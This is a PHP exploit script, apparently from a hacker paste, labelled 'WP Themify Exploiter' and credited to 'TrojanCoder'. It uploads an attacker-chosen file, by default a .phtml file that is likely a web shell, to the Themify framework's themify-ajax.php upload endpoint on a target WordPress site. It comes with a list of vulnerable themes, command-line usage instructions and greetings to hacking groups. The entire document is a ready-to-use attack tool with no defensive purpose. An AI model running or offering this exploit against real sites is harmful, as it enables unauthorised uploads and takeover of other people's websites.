WP Themify Exploiter

1. <?php
2.  
3. /*----Themify Ajax Exploiter----*/
4. $uploadfile = "khu.phtml"; //Change to your filename
5. function help() {
6. $namaku = $_SERVER[argv][0];
7. $help = "
8.  _____         _          
9. |_   _| _ ___ (_)__ _ _ _  
10.   | || '_/ _ \| / _` | ' \
11.   |_||_| \___// \__,_|_||_|
12.             |__/          
13.  
14. WP Themify Framework Exploiter by TrojanCoder
15. Created on 15-01-2017
16.  
17. List Themes Using Themify Framework :
18. Flatshop, Magazine , Flat Flat , Parallax , Bold, Metro , Pinshop , Agency , Slide , Postline , Fullscreen , Pinboard , Shopo , Minshop , Notes , ShopDock , PhotoTouch , Basic , Responz , Simfo , Grido , Tisa , Suco , Elemin , Folo , Funki , Minblr , iTheme2 , Newsy , Wumblr , Rezo , Photobox , Edmin , Koi , Bizco , ThemeMin , Wigi , Blogfolio , Sidepane , Bloggie.
19.  
20. Usage : php ".$namaku." <www.target.com> <theme-name>
21. Example : php ".$namaku." www.target.com funki
22.  
23. Greetz : 1ntr0ver7_Tersakiti - T1KUS90T - Xai Syndicate - Garuda Security Hacker\n\n";
24. echo $help;
25. }
26.  
27. /*----Hwhw----*/
28.  
29. if(!file_exists($uploadfile)) {
30. help();
31. print "Your file not found !\n\n";
32. exit;
33. }
34.  
35. $url = $_SERVER[argv][1];
36. $theme = $_SERVER[argv][2];
37.  
38. if($url || $theme) {
39. $target = "http://".$url."/wp-content/themes/".$theme."/themify/themify-ajax.php?upload=1";
40. $ch = curl_init($target);
41. curl_setopt($ch, CURLOPT_POST, true);
42. curl_setopt($ch, CURLOPT_POSTFIELDS,
43. array('Filedata'=>"@$uploadfile"));
44. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
45. $postResult = curl_exec($ch);
46. curl_close($ch);
47. print "$postResult";
48. print "\n";
49. exit;
50. }
51.  
52. if(!$url || !$theme) {
53. help();
54. exit;
55. }
56.  
57. /*----Done----*/
58.  
59. ?>